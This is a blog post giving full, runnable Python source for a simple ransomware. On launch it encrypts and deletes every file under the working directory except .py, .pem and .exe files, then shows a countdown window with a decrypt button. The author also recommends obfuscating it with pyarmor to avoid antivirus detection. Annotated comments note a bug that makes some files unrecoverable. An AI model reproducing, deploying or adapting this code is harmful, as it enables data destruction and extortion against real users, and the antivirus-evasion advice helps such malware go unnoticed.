Monday, December 19, 2022

A Simple Ransomware in Python

Ransomware is malicious software (malware) that, in the case of the sample I prepared, encrypts files and notifies the file owner that the files were encrypted and will only be decrypted after the owner pays the attacker (the hacker) some amount of money or meets any other condition set by the hacker.

The ransomware I created encrypts every file whose extension is not in the list of excluded file extensions specified inside the program, within the directory where the Python script is located (the file walker in the code also descends into subdirectories). After all of the files are encrypted, a window appears; just press the Decrypt button in that window to decrypt the files. The encrypted files have the extension ".p4wn3d" and the decrypted files have the extension ".ransomized".

See the screenshots below:

1. Directory where the ransomware is located:


2. This is the result after the script was executed:



3. The screen appeared after file encryption:



4. This is the result after the decrypt button was pressed:


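Antivirus products could detect the Python script if it is converted to an .exe file. A popular method for avoiding antivirus detection is to obfuscate the Python script with pyarmor before compiling it to an executable file. Obfuscation only changes how the file looks on disk: what the program does at run time (reading each file, writing a ".p4wn3d" copy and deleting the original) is unchanged and remains visible to behaviour-based monitoring.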

Pyarmor has many features; it can also obfuscate an executable file so that it includes an expiring license, and extend these licenses when needed. Please note that I am not promoting pyarmor; I am just sharing what I know that could be useful for anyone beginning to use Python.

Here is the code:

import os
from pathlib import Path
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES
import tkinter as tk

# A fresh 2048-bit RSA key pair is generated on every run. Both halves live only
# in this process's memory: nothing in this script writes them to disk, so files
# encrypted below can be restored only while this same process is still running.
key = RSA.generate(2048)
privKey = key.export_key()  # exported private key, later passed to decryptor() by decrypt()
pubKey = key.publickey().export_key()  # exported public key, passed to crypter()


def checkFiles(bDir):
    """Lazily yield an ``os.DirEntry`` for every file found beneath *bDir*.

    Entries for which ``is_file()`` is false are assumed to be directories
    and are walked recursively, so the whole tree under *bDir* is covered.

    Args:
        bDir: Path of the directory to start scanning from.

    Yields:
        os.DirEntry: one entry per file, in ``os.scandir`` order.
    """
    for entry in os.scandir(bDir):
        if not entry.is_file():
            # Not a file: descend into it and relay whatever it contains.
            yield from checkFiles(entry.path)
            continue
        yield entry

def crypter(dFile, publicKey):
    """Encrypt one file into a ``.p4wn3d`` container and delete the original.

    Hybrid scheme: a random 16-byte AES key encrypts the file content in EAX
    mode, and that AES key is itself encrypted with RSA-OAEP under *publicKey*.

    Container layout, in write order (this is what ``decryptor`` reads back):
        1. RSA-OAEP-encrypted AES key
        2. EAX nonce
        3. EAX authentication tag
        4. ciphertext (rest of the file)

    Args:
        dFile: ``pathlib.Path`` of the file to encrypt (``.suffix`` is used).
        publicKey: exported RSA public key accepted by ``RSA.import_key``.

    Raises:
        ValueError: when *dFile* has no suffix, because ``str.split('')``
            rejects an empty separator.

    NOTE(review): the output name keeps only the text before the first
    occurrence of the lower-cased suffix and drops the original extension, so
    ``a.txt`` and ``a.doc`` both map to ``a.p4wn3d``. The later write replaces
    the earlier container while both originals are deleted, which makes the
    first file unrecoverable even with the private key.
    """

 
    extension = dFile.suffix.lower()
    dFile = str(dFile)
    # The whole file is read into memory in one call.
    with open(dFile, 'rb') as f:
        f_cont = f.read()
    

    f_cont = bytes(f_cont)


    key = RSA.import_key(publicKey)
    # Per-file 16-byte session key taken from the OS random source.
    lovekey = os.urandom(16)


    # Wrap the session key with the RSA public key (OAEP padding).
    crypty = PKCS1_OAEP.new(key)
    cryptyKey = crypty.encrypt(lovekey)


    # No nonce is passed here; the cipher object's own nonce is written to the
    # container below.
    crypty = AES.new(lovekey, AES.MODE_EAX)
    cryptytext, tag = crypty.encrypt_and_digest(f_cont)


    # Text before the first occurrence of the suffix, plus the fixed marker extension.
    fName= dFile.split(extension)[0]
    fileExtn = '.p4wn3d'
    cryptyFile = fName + fileExtn
    with open(cryptyFile, 'wb') as f:
        [ f.write(x) for x in (cryptyKey, crypty.nonce, tag, cryptytext) ]
    # The plaintext original is removed once the container has been written;
    # from here on the data exists only in encrypted form.
    os.remove(dFile)

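def decryptor(dFile, privateKey):
    """Restore one ``.p4wn3d`` container to plaintext with the RSA private key.

    The container is read in this order: RSA-OAEP-encrypted AES session key
    (``key.size_in_bytes()`` bytes), 16-byte EAX nonce, 16-byte EAX tag, then
    the ciphertext up to end of file.

    The plaintext is written next to the container with the final suffix
    replaced by ``.ransomized``. The container itself is left in place, and
    the file's original extension is not restored (it is not stored in the
    container).

    Args:
        dFile: ``pathlib.Path`` of the encrypted container.
        privateKey: exported RSA private key accepted by ``RSA.import_key``.

    Raises:
        ValueError: propagated from the Crypto calls when the session key
            cannot be recovered or the EAX tag does not verify (wrong key,
            truncated or modified container). Nothing is written in that case.
    """
    key = RSA.import_key(privateKey)

    with open(dFile, 'rb') as f:
        encryptedSessionKey, nonce, tag, ciphertext = [
            f.read(x) for x in (key.size_in_bytes(), 16, 16, -1)
        ]

    # Recover the per-file AES session key.
    cipher = PKCS1_OAEP.new(key)
    sessionKey = cipher.decrypt(encryptedSessionKey)

    # Decrypt and authenticate in one step; a tag mismatch raises before any
    # output file is created.
    cipher = AES.new(sessionKey, AES.MODE_EAX, nonce)
    data = cipher.decrypt_and_verify(ciphertext, tag)

    # Replace only the final suffix. The previous str.split() on the
    # lower-cased suffix cut the path at the first occurrence of that text
    # (for example inside a parent directory name), failed to strip a suffix
    # written in a different case, and raised on a path without a suffix.
    decryptedFile = Path(dFile).with_suffix('.ransomized')
    with open(decryptedFile, 'wb') as f:
        f.write(data)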
    


# Encryption pass. It runs as soon as the module executes, before any window
# is created. './' is resolved against the process's current working
# directory, and checkFiles() descends into every subdirectory below it.
dir_y = './' 
# Suffixes that are skipped (compared after lower-casing). '.p4wn3d' and
# '.ransomized' are not listed, so a second run would encrypt the output of an
# earlier run again under a new key pair.
ftype_excl = ['.py','.pem', '.exe'] 
for fil_e in checkFiles(dir_y): 
    to_encrypt = Path(fil_e)
    fileType = to_encrypt.suffix.lower()

    if fileType in ftype_excl:
        continue
    # Writes the container and deletes the original file.
    crypter(to_encrypt, pubKey)

# Flag shared with decrypt(): 0 while the timer should keep running, 1 once
# decryption has been triggered.
x = 0


def countdown(count):
    """Show *count* on the timer label and reschedule itself one second later.

    Args:
        count: remaining time as an ``'H:M:S'`` string.

    Does nothing once the module-level flag ``x`` is non-zero, and stops
    rescheduling when the remaining time reaches zero.
    """
    global x
    if x != 0:
        return

    hour, minute, second = (int(part) for part in count.split(':'))
    label['text'] = '{}:{}:{}'.format(hour, minute, second)

    if not (second > 0 or minute > 0 or hour > 0):
        # Timer expired: leave the last value on screen, schedule nothing.
        return

    # Take one second off, borrowing from minutes and hours as needed.
    if second > 0:
        second -= 1
    elif minute > 0:
        minute, second = minute - 1, 59
    else:
        hour, minute, second = hour - 1, 59, 59

    root.after(1000, countdown, '{}:{}:{}'.format(hour, minute, second))
def decrypt():
    """Button callback: decrypt every ``.p4wn3d`` file under ``dir_y``.

    Uses the in-memory ``privKey`` generated at start-up, then updates the
    timer label and sets the flag ``x`` so that ``countdown`` stops.
    """
    global x, dir_y, privKey

    wanted_suffixes = ['.p4wn3d']

    for entry in checkFiles(dir_y):
        candidate = Path(entry)
        if candidate.suffix.lower() not in wanted_suffixes:
            continue
        decryptor(candidate, privKey)

    label['text'] = 'Decrypted!'
    x = 1
# Notification window. It is built only after the encryption pass above has
# finished.
root = tk.Tk()
root.title('P4WN3D Ransomware')
root.geometry('500x300')
root.resizable(False, False)
# Static banner text.
label1 = tk.Label(root, text='You are p4wn3d! \n This is a demo ransomware! \n For Educational Purposes ONLY! \n', font=('arial', 12,'bold'))
label1.pack()
# Timer display; countdown() and decrypt() both write to label['text'].
label = tk.Label(root,font=('arial', 50,'bold'), fg='white', bg='blue')
label.pack()


# Pressing the button runs decrypt() with the private key held in memory.
B = tk.Button(root, text ="Decrypt", command = decrypt, height= 2, width=15)


# pack() is immediately followed by place(), so the button ends up positioned
# by the absolute coordinates given to place().
B.pack()
B.place(x=50, y=200)

# Start the one-hour timer. When it reaches zero countdown() only stops
# rescheduling itself; no other action is tied to expiry.
countdown('01:00:00')
# mainloop() blocks until the window is closed. The script has nothing after
# it, so the process then ends and the in-memory private key goes with it.
root.mainloop()             
